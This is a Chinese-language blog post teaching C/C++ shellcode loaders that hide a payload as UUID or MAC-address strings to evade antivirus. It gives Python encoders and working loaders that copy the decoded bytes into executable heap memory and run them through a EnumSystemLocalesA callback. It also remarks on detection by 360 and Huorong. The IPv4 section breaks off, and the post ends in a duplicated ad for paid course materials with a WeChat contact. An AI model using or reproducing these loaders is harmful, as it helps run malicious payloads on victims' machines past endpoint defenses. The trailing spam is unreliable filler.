参考文章:
https://github.com/INotGreen/Bypass-AMSI
https://mp.weixin.qq.com/s/oJ8eHdX8HGuk6dZv0kmFxg
https://kyxiaxiang.github.io/2022/12/14/AMSIandEtw
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
文章参考:
https://www.anquanke.com/post/id/262666
C/C++内存加载-UUID方式-ShellCode转换
通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。
1、先用python代码将shellcode转换成uuid值
2、命令python u.py payload.bin
from uuid import UUID
import sys
if len(sys.argv) < 2:
print("Usage: %s <shellcode\_file>" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], "rb") as f:
chunk = f.read(16)
print("{}const char\* uuids[] =".format(' '\*4))
print(" {")
while chunk:
if len(chunk) < 16:
padding = 16 - len(chunk)
chunk = chunk + (b"\x90" \* padding)
print("{}\"{}\"".format(' '\*8,UUID(bytes_le=chunk)))
break
print("{}\"{}\",".format(' '\*8,UUID(bytes_le=chunk)))
chunk = f.read(16)
print(" };")
3、将uuid值填入const char* uuids[] = { “xxx” };
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
using namespace std;
const char\* uuids[] = { "xxx" };
int main() {
HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
void\* hmem = HeapAlloc(hHeap, 0, 0x1000);
printf("%p\n", hmem);
DWORD_PTR ptr = (DWORD_PTR)hmem;
int init = sizeof(uuids) / sizeof(uuids[0]);
for (int i = 0; i < init; i++) {
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID\*)ptr);
if (status != RPC_S_OK) {
printf("UuidFromStringA != RPC\_S\_OK\n");
CloseHandle(hmem);
return -1;
}
ptr += 16;
}
printf("[+] HexDump: \n");
for (int i = 0; i < init \* 16; i++) {
printf("%02X ", ((unsigned char\*)hmem)[i]);
//((unsigned char\*)hmem)[i] ^= 0x39;
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);
CloseHandle(hmem);
return 0;
}
4、生成文件exe,可以上线,但是杀软被杀
火绒 分离uuid
360 检测UuidFromStringA 使用动态api hook
先使用工具studype查看导出表

UuidFromStringA函数在RPCRT4.dll里面
C/C++内存加载-MAC方式-ShellCode转换
MAC地址也叫物理地址、硬件地址,由网络设备制造商生产时烧录在网卡的EPROM一种闪存芯片,通常可以通过程序擦写。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。
from macaddress import MAC
import sys
if len(sys.argv) < 2:
print("Usage: %s <shellcode\_file>" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], "rb") as f:
chunk = f.read(6)
print("{}const char\* MAC[] =".format(' '\*4))
print(" {")
while chunk:
if len(chunk) < 6:
padding = 6 - len(chunk)
chunk = chunk + (b"\x90" \* padding)
print("{}\"{}\"".format(' '\*8,MAC(chunk)))
break
print("{}\"{}\",".format(' '\*8,MAC(chunk)))
chunk = f.read(6)
print(" };")
#include <Windows.h>
#include <stdio.h>
#include <Ip2string.h>
#pragma comment(lib, "Ntdll.lib")
#ifndef NT\_SUCCESS
#define NT\_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
#define \_CRT\_SECURE\_NO\_WARNINGS
#pragma warning(disable:4996)
int Error(const char\* msg) {
printf("%s (%u)", msg, GetLastError());
return 1;
}
int main() {
const char\* MAC[] =
{
xxxx
};
int rowLen = sizeof(MAC) / sizeof(MAC[0]);
PCSTR Terminator = NULL;
DL_EUI48\* LpBaseAddress2 = NULL;
NTSTATUS STATUS;
HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
void\* hmem = HeapAlloc(hHeap, 0, 0x1000);
DWORD_PTR ptr = (DWORD_PTR)hmem;
for (int i = 0; i < rowLen; i++) {
STATUS = RtlEthernetStringToAddressA((PCSTR)MAC[i], &Terminator,
(DL_EUI48\*)ptr);
if (!NT\_SUCCESS(STATUS)) {
printf("[!] RtlEthernetStringToAddressA failed in %s result %x(% u)", MAC[i], STATUS, GetLastError());
return FALSE;
}
ptr += 6;
}
printf("[+] HexDump: \n");
for (int i = 0; i < 6 \* rowLen; i++) {
printf("%02X ", ((unsigned char\*)hmem)[i]);
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)hmem, 0);
CloseHandle(hmem);
return 0;
}
C/C++内存加载-IPV4方式-ShellCode转换
IPv4是一种无连接的协议,操作在使用分组交换的链路层(如以太网)上。此协议会尽最大努力交付数据包,意即它不保证任何数据包均能送达目的地,也不保证所有数据包均按照正确的顺序无重复地到达。IPv4使用32位(4字节)地址。
1、先用python代码将shellcode转换成ipv4值
2、命令python u.py payload.bin
from ipaddress import ip_address
import sys
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**






**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**

适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新**
**如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**
[外链图片转存中...(img-EjOeKB7F-1713051351613)]
2639

被折叠的 条评论
为什么被折叠?



